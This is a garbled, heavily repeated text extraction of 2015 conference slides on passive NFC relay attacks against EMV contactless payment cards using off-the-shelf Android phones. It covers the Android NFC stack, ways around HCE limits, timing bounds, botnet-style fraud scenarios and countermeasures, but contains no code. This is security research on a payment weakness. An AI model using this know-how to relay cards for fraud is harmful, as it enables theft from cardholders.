Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (III)
Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)
Mafia frauds ndash Y Desmedt (SecuriComrsquo88)
P minusrarr V communication link P minusrarr V
Real-time fraud where a fraudulent prover P and verifierV cooperate
Honest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36
Background (III)
Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)
Mafia frauds ndash Y Desmedt (SecuriComrsquo88)
P minusrarr V communication link P minusrarr V
Real-time fraud where a fraudulent prover P and verifierV cooperateHonest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 17 36
Android and NFC A Tale of Lrve (I)Recap on evolution of Android NFC support
Android 42 Jelly Bean (API level 17)
NfcBarcode
IsoPcdB(ISOIEC 14443-4B)
IsoPcdA(ISOIEC 14443-4A)
Android CyanogenMod OS 91
NfcA(ISOIEC 14443-3A)
NfcB(ISOIEC 14443-3B)
NfcV(ISOIEC 15693)
IsoDep(ISOIEC 14443-4)
NfcF(JIS 6319-4)
Ndef
Android 233 Gingerbread (API level 10)
NdefFormatable MifareClassic
MifareUltralight
Android 44 KitKat (API level 19)
thanks to Doug Year
Software
ReaderWriter
Peer-to-peer
Card-emulation
Hardware
Card-emulation
Software
ReaderWriter
Peer-to-peer
Hardware
Card-emulation NfcAdapterReaderCallback
added
NFC
op
erati
on
mod
es
su
pp
orte
d
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 18 36
Android and NFC A Tale of Lrve (II)Digging into Android NFC stack
Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)
libnfc-nxp
libnfc-nci
NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36
Android and NFC A Tale of Lrve (II)Digging into Android NFC stack
Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)
libnfc-nxp
libnfc-nci
NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36
Android and NFC A Tale of Lrve (III)Digging into Android NFC stack ndash ReaderWriter mode
Not allowed to be set directlyrarr Android activity
Android NFC service selects apps according to tag definition ofManifest fileIn low-level libnfc-nci uses reliable mechanism of queues andmessage passing ndash General Kernel Interface (GKI)
Makes communication between layers and modules easier
User App
Tag
NFC developer framework
NfcService
mTagServicetransceive
IPC
TagService
DeviceHostTagEndPoint
ltltrealizegtgt
NativeNfcTag
JNI
doTransceive
System NFC Library
NativeNfcTagcpp
libnfc-nci
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 20 36
Android and NFC A Tale of Lrve (IV)Digging into Android NFC stack ndash HCE mode
A service must be implemented to process commands and replies
HostApduService abstract class and processCommandApdu methodAID-based routing service table
This means you need to declare in advance what AID you handle
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 21 36
Android and NFC A Tale of Lrve (V)Digging into Android NFC stack ndash Summary
Description Language(s) Dependency OSSNFC developer framework Java C++ API level Yes
(comandroidnfc package)System NFC library CC++ Manufacturer Yes(libnfc-nxp or libnc-nci)
NFC Android kernel driver C Hardware and manufac-turer
Yes
NFC firmware ARM Thumb Hardware and No(systemvendorfirmware directory) manufacturer
Some useful linkshttpsandroidgooglesourcecomplatformframeworksbase+mastercorejavaandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+mastersrccomandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+masternci
httpsandroidgooglesourcecomplatformexternallibnfc-nci+mastersrc
httpnfc-forumorgour-workspecifications-and-application-documentsspecifications
nfc-controller-interface-nci-specifications
httpwwwcardsysdkdownloadNFC_DocsNFC20Controller20Interface20(NCI)20Technical
20Specificationpdf
httpwwwdatasheet4ucomPDF845670BCM20793Shtml
httpwwwdatasheet4ucomPDF845671BCM20793SKMLGhtml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 22 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice umlJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 25 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1
Distributed Mafia Fraud
BOT
BOTMASTER
BOT
BOT
BOT
BOT
BOT
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36
Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2
Hiding Fraud Locations
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36
Relay Attack Implementation (IV)Resistant Mechanisms
Brief summary of resistant mechanismsDistance-bounding protocols
Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages
Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands
Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36
Related WorkOn relay attacks
2005-2009 First works built on specific hardware
2010 Nokia mobile phones with NFC capability plus a Java MIDletapp
2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device
2014 Active relay attacks with custom hardware and customAndroid firmware
Several works studied delay upon relay channel
Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint
Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Relay Attacks in EMV Contactless Cardswith Android OTS Devices
Jose Viladagger Ricardo J RodrıguezDagger
pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed
daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity
University of Zaragoza Spain University of Leon Spain
May 28 2015
Hack in the Box 2015Amsterdam (Nederland)
Introduction to NFC (VII)
Ok So is it secure right RightIf it were so secure you would not be staring at us uml
NFC security threatsEavesdropping
Secure communication as solution
Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)
RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)
We focus on passive relay attacks
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36
Introduction to NFC (VII)
Ok So is it secure right RightIf it were so secure you would not be staring at us uml
NFC security threatsEavesdropping
Secure communication as solution
Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)
RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)
We focus on passive relay attacks
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36
Introduction to NFC (VIII)
NFC brings ldquocardsrdquo to mobile devicesPayment sector is quite interested in this newway for making payments
500M NFC payment users expected by 2019
Almost 300 smart phones available at themoment with NFC capabilities
Check httpwwwnfcworldcomnfc-phones-list
Most of them runs Android OS
Research HypothesisCan a passive relay attack be performed in contactless paymentcards using an Android NFC-capable device
If so what are the constraints (whether any exists)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 12 36
Introduction to NFC (VIII)
NFC brings ldquocardsrdquo to mobile devicesPayment sector is quite interested in this newway for making payments
500M NFC payment users expected by 2019
Almost 300 smart phones available at themoment with NFC capabilities
Check httpwwwnfcworldcomnfc-phones-list
Most of them runs Android OS
Research HypothesisCan a passive relay attack be performed in contactless paymentcards using an Android NFC-capable device
If so what are the constraints (whether any exists)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 12 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 13 36
Background (I)EMV contactless cards
Europay Mastercard and VISA standard for inter-operation of ICcards Point-of-Sale terminals and automated teller machines
Authenticating credit and debit card transactionsCommands defined in ISOIEC 7816-3 and ISOIEC 7816-4(httpenwikipediaorgwikiEMV)
Application ID (AID) command
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 14 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (III)
Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)
Mafia frauds ndash Y Desmedt (SecuriComrsquo88)
P minusrarr V communication link P minusrarr V
Real-time fraud where a fraudulent prover P and verifierV cooperate
Honest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36
Background (III)
Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)
Mafia frauds ndash Y Desmedt (SecuriComrsquo88)
P minusrarr V communication link P minusrarr V
Real-time fraud where a fraudulent prover P and verifierV cooperateHonest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 17 36
Android and NFC A Tale of Lrve (I)Recap on evolution of Android NFC support
Android 42 Jelly Bean (API level 17)
NfcBarcode
IsoPcdB(ISOIEC 14443-4B)
IsoPcdA(ISOIEC 14443-4A)
Android CyanogenMod OS 91
NfcA(ISOIEC 14443-3A)
NfcB(ISOIEC 14443-3B)
NfcV(ISOIEC 15693)
IsoDep(ISOIEC 14443-4)
NfcF(JIS 6319-4)
Ndef
Android 233 Gingerbread (API level 10)
NdefFormatable MifareClassic
MifareUltralight
Android 44 KitKat (API level 19)
thanks to Doug Year
Software
ReaderWriter
Peer-to-peer
Card-emulation
Hardware
Card-emulation
Software
ReaderWriter
Peer-to-peer
Hardware
Card-emulation NfcAdapterReaderCallback
added
NFC
op
erati
on
mod
es
su
pp
orte
d
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 18 36
Android and NFC A Tale of Lrve (II)Digging into Android NFC stack
Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)
libnfc-nxp
libnfc-nci
NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36
Android and NFC A Tale of Lrve (II)Digging into Android NFC stack
Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)
libnfc-nxp
libnfc-nci
NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36
Android and NFC A Tale of Lrve (III)Digging into Android NFC stack ndash ReaderWriter mode
Not allowed to be set directlyrarr Android activity
Android NFC service selects apps according to tag definition ofManifest fileIn low-level libnfc-nci uses reliable mechanism of queues andmessage passing ndash General Kernel Interface (GKI)
Makes communication between layers and modules easier
User App
Tag
NFC developer framework
NfcService
mTagServicetransceive
IPC
TagService
DeviceHostTagEndPoint
ltltrealizegtgt
NativeNfcTag
JNI
doTransceive
System NFC Library
NativeNfcTagcpp
libnfc-nci
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 20 36
Android and NFC A Tale of Lrve (IV)Digging into Android NFC stack ndash HCE mode
A service must be implemented to process commands and replies
HostApduService abstract class and processCommandApdu methodAID-based routing service table
This means you need to declare in advance what AID you handle
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 21 36
Android and NFC A Tale of Lrve (V)Digging into Android NFC stack ndash Summary
Description Language(s) Dependency OSSNFC developer framework Java C++ API level Yes
(comandroidnfc package)System NFC library CC++ Manufacturer Yes(libnfc-nxp or libnc-nci)
NFC Android kernel driver C Hardware and manufac-turer
Yes
NFC firmware ARM Thumb Hardware and No(systemvendorfirmware directory) manufacturer
Some useful linkshttpsandroidgooglesourcecomplatformframeworksbase+mastercorejavaandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+mastersrccomandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+masternci
httpsandroidgooglesourcecomplatformexternallibnfc-nci+mastersrc
httpnfc-forumorgour-workspecifications-and-application-documentsspecifications
nfc-controller-interface-nci-specifications
httpwwwcardsysdkdownloadNFC_DocsNFC20Controller20Interface20(NCI)20Technical
20Specificationpdf
httpwwwdatasheet4ucomPDF845670BCM20793Shtml
httpwwwdatasheet4ucomPDF845671BCM20793SKMLGhtml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 22 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
